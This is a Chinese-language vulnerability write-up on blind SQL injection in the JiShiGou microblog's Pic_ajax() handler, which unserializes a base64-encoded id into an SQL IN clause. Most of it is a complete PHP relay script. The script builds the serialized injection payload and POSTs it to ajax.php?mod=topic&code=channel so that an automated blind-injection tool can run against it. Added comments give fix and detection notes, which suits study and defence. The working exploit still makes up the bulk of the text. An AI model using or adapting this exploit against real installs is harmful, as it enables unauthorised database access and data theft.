记事狗微博 注入

/modules/ajax/topic.mod.php

function Pic_ajax()

{//echo 11;

//echo base64_encode(serialize(array('a'=>'0\'#')));

$options = array();

$TopicListLogic = Load::logic('topic_list', 1);

$per_page_num = $this->Post['pp_num'] ? (int)$this->Post['pp_num'] : 20;

$cache_time = $this->Post['c_time'] ? (int)$this->Post['c_time'] : 10;

$uid = $this->Post['uid'] ? $this->Post['uid'] : '';

if($this->Code =='channel'){

$id = $this->Post['id'] ? $this->Post['id'] : ''; //获取

$options = array(

'item'=>'channel',

'item_id' => unserialize(base64_decode($id)),//解码,应为Base64所以无视Gpc。。

'perpage' => $per_page_num,

);

$info = $TopicListLogic->get_data($options);//查询函数 里面也没做任何过滤

get_data($param, $caller = "web")

.....

$item_ids = $this->_process_param($param['item_id']);//这里 赋值

$item = trim($param['item']);

.....

$where_sql = ($perm_sql ? " AND {$perm_sql} " : '').

(isset($param['tid']) ? ' AND `tid` IN ('.jimplode($tids).') ' : '').

($roottids ? ' AND roottid IN ('.jimplode($roottids).') ' : '').

($from ? " AND `from`='{$from}' " : '').

($item_ids ? " AND `item_id` IN (".jimplode($item_ids).") ": '').//写入语句

($item ? " AND `item`='{$item}' " : '').

($content ? " AND `content`='{$content}' " : '').

($content2 ? " AND `content2`='{$content2}' " : '').

($filter_sql ? ' and '.$filter_sql : '');

test


可能注入起来比较麻烦

因为没有回显，只能盲注，

所以我写了个中转程序，丢给工具跑

<?php

/*
 * Relay script from the write-up: it wraps the value of GET `id` into the
 * serialized + base64-encoded `id` POST field that Pic_ajax() in
 * /modules/ajax/topic.mod.php unserializes (see the excerpt above), sends the
 * request, and echoes the response body.
 *
 * Defender's notes (all grounded in the excerpt above):
 *  - Sink: `unserialize(base64_decode($id))` becomes `item_id`, which get_data()
 *    concatenates into an `IN (...)` clause via jimplode(); the write-up states
 *    no filtering happens on that path.
 *  - Why GPC escaping does not help: the quote arrives inside a base64 blob, so
 *    escaping applied to the raw request parameter never sees it (the write-up's
 *    own comment on the `item_id` line).
 *  - Fix: do not unserialize request data; cast each item id to int (or bind it
 *    as a query parameter) before it reaches the SQL string.
 *  - Detection: POST ajax.php?mod=topic&code=channel whose `id` base64-decodes
 *    to a PHP serialized string containing quotes or SQL keywords; a blind run
 *    like the one described here presumably produces a large volume of such
 *    near-identical requests from one source.
 */

// payload: serialized array, base64-encoded to match what Pic_ajax() expects;
// the injected expression is taken from GET id. Note `$_GET[id]` uses a bare
// word as the array key (relies on PHP's undefined-constant fallback).
$data=base64_encode(serialize(array('a'=>'0\') and 1='.$_GET[id].'#')));

$flag = 0;

$post = '';

$errno = '';

$errstr = '';

// target host/path of the JiShiGou install used in the write-up (local test box)
$host='127.0.0.1';

$path='/jsg';

// POST fields to send; only `id` is needed by the channel branch of Pic_ajax()
$argv = array(

'id'=>$data,

);

// urlencode each field and join with '&' after the first one
foreach ($argv as $key=>$value) {

if ($flag!=0) {

$post .= "&";

$flag = 1;

}

$post.= $key."="; $post.= urlencode($value);

$flag = 1;

}

$length = strlen($post);

// open the TCP connection (10 s timeout); abort with the socket error on failure
$fp = fsockopen("$host",80,$errno,$errstr,10) or exit($errstr."--->".$errno);

// build the raw POST request headers by hand
$header= "POST {$path}/ajax.php?mod=topic&code=channel HTTP/1.1\r\n";

$header .= "Host: {$host}\r\n";

$header .= "Referer: /flandy/post.php\r\n";

$header .= "Content-Type: application/x-www-form-urlencoded\r\n";

$header .= "Content-Length: ".$length."\r\n";

$header .= "Connection: Close\r\n\r\n";

// append the urlencoded POST body
$header .= $post."\r\n";

// send the request
fputs($fp,$header);

$inheader = 1;

while (!feof($fp)) {

$line = fgets($fp,1024); // skip the response headers; only the page body is echoed

if ($inheader && ($line == "\n" || $line == "\r\n")) {

$inheader = 0;

}

if ($inheader == 0) {

echo $line;

}

}

fclose($fp);

?>

跑起来的速度还凑合


